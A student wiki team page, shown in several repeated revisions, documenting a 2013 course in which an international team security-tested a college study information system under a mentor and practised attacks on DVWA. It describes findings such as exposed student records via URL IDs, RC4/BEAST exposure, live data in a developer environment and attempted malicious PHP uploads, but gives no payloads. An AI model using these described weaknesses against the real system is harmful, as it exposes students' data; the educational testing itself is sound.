** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.

I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===
* What I did like:
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* What I did not like:
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T08:27:19Z

Saus: /* Feedback from Sten Aus */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.

I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T08:25:04Z

Saus: /* IP Feed-back */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
